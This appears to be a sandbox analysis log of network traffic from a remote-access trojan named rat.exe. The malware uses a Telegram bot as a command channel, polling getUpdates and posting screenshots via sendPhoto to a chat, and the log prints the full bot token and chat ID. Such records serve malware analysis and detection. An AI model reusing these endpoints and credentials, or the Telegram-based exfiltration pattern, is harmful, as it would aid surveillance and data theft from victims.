                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506650
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506650 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:40 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506651
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506651 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:41 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506652
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506652 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:42 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • 149.154.167.220:443
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506644
                                      tls, http
                                      rat.exe
                                      24.9kB
                                       58.5kB
                                       216
                                      129

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%F0%9F%8D%80%20Bot%20connected

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=1

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=2

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=3

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=4

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=5

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=6

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=7

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=8

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=9

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=10

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=11

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=12

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=13

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=14

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506592

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506593

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506594

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506595

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506596

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506597

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506598

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506599

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506600

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506601

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506602

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506603

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506604

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506605

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506606

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506593

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506594

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506595

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506596

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506597

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506598

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506599

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506600

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506601

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506602

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506603

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506604

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506605

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506606

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506607

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506608

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506609

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506610

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506594

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506595

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506596

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506597

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506598

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506599

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506600

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506601

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506602

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506603

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506604

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506605

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506606

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506607

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506608

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506609

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506610

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506611

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506612

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506613

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506614

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506615

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506616

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506617

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506618

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506619

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506620

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506621

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506622

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506623

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506624

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506625

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506626

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506627

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506628

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506629

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506630

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506631

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506632

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506633

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506634

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506635

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506636

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506637

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506638

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506639

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506640

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506641

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506642

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506643

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506644

                                      HTTP Response

                                      200
                                    • 149.154.167.220:443
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendPhoto?chat_id=-4791200354
                                      tls, http
                                      rat.exe
                                      457.5kB
                                       6.5kB
                                       336
                                      123

                                      HTTP Request

                                      POST https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendPhoto?chat_id=-4791200354

                                      HTTP Response

                                      200
                                    • 142.250.187.196:443
                                      https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGIiG-7sGIjDs9k9B6N6dO-qe16bxlqE_8wYFppdPyDfpy0X1573l7daqnUEbbbKLrj8vUyukk2oyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                      tls, http2
                                      chrome.exe
                                      3.2kB
                                       17.2kB
                                       32
                                      40

                                      HTTP Request

                                      GET https://www.google.com/async/ddljson?async=ntp:2

                                      HTTP Request

                                      GET https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0

                                      HTTP Request

                                      GET https://www.google.com/async/newtab_promos

                                      HTTP Request

                                      GET https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS117BTGIiG-7sGIjCI2qRX3K85NHGD_h1oGx8vmuIc11KcfmHfKLBQgSl9f3L8LvezMRz8XYrk8cPCiagyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

                                      HTTP Request

                                      GET https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGIiG-7sGIjDs9k9B6N6dO-qe16bxlqE_8wYFppdPyDfpy0X1573l7daqnUEbbbKLrj8vUyukk2oyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                    • 142.250.187.238:443
                                      https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D93%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D93%2526e%253D1
                                      tls, http2
                                      chrome.exe
                                      2.2kB
                                       9.7kB
                                       15
                                      17

                                      HTTP Request

                                      GET https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D93%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D93%2526e%253D1
                                    • 142.250.200.33:443
                                      https://clients2.googleusercontent.com/crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx
                                      tls, http2
                                      chrome.exe
                                      4.9kB
                                       173.2kB
                                       80
                                      130

                                      HTTP Request

                                      GET https://clients2.googleusercontent.com/crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx
                                    • 149.154.167.220:443
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendPhoto?chat_id=-4791200354
                                      tls, http
                                      rat.exe
                                      58.9kB
                                       8.5kB
                                       57
                                      31

                                      HTTP Request

                                      POST https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendPhoto?chat_id=-4791200354

                                      HTTP Response

                                      200
                                    • 149.154.167.220:443
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendPhoto?chat_id=-4791200354
                                      tls, http
                                      rat.exe
                                      59.1kB
                                       9.1kB
                                       55
                                      46

                                      HTTP Request

                                      POST https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendPhoto?chat_id=-4791200354

                                      HTTP Response

                                      200
                                    • 149.154.167.220:443
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506652
                                      tls, http
                                      rat.exe
                                      2.7kB
                                       10.0kB
                                       23
                                      17

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506645

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506646

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506647

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506648

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506649

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506650

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506651

                                      HTTP Response

                                      200

                                      HTTP Request

                                      GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506652

                                      HTTP Response

                                      200
                                    • 8.8.8.8:53
                                      8.8.8.8.in-addr.arpa
                                      dns
                                      66 B
                                       90 B
                                       1
                                      1

                                      DNS Request

                                      8.8.8.8.in-addr.arpa

                                    • 8.8.8.8:53
                                      60.153.16.2.in-addr.arpa
                                      dns
                                      70 B
                                       133 B
                                       1
                                      1

                                      DNS Request

                                      60.153.16.2.in-addr.arpa

                                    • 8.8.8.8:53
                                      196.249.167.52.in-addr.arpa
                                      dns
                                      73 B
                                       147 B
                                       1
                                      1

                                      DNS Request

                                      196.249.167.52.in-addr.arpa

                                    • 8.8.8.8:53
                                      75.159.190.20.in-addr.arpa
                                      dns
                                      72 B
                                       158 B
                                       1
                                      1

                                      DNS Request

                                      75.159.190.20.in-addr.arpa

                                    • 8.8.8.8:53
                                      google.com
                                      dns
                                      rat.exe
                                      56 B
                                       72 B
                                       1
                                      1

                                      DNS Request

                                      google.com

                                      DNS Response

                                      142.250.180.14

                                    • 8.8.8.8:53
